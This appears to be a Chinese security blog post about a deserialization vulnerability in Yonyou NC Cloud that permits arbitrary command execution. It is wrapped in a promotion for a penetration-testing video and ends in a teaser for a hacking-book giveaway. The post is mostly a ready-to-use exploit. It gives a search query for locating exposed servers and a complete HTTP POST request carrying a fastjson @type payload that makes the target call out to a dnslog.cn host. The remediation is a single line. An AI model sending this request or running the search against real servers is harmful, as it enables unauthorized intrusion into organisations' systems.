文章预览
高级内网域渗透实战思路+武器化研究技术分享视频 录播观看 地址 https://www.bilibili.com/video/BV17WvNexE6t/?vd_source=968431fb69493dc946362b62f2c6b094 0x01 前言 用友NC Cloud存在反序列化漏洞 。 攻击者可以利用此漏洞执行任意命令 , 通过该漏洞可以获取服务器权限 。 0x02 影响平台 NC-Cloud 0x03 漏洞复现 搜索语法 app = "用友-NC-Cloud" EXP如下: POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1 Host : ip:port User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36 Content-Type : application/json Content-Length : 113 { "clientParam" : "{\" x\ ":{\" @type\ ":\" java.net.InetSocketAddress\ "{\" address\ ":,\" val\ ":\" p76bl0.dnslog.cn\ "}}}" } Suc c e ss~ 0x04 修复方案 建议及时更新至最新版本! 福利抽奖 一:Windows黑客编程技术详解 近年来,全球大规模爆发勒索
………………………………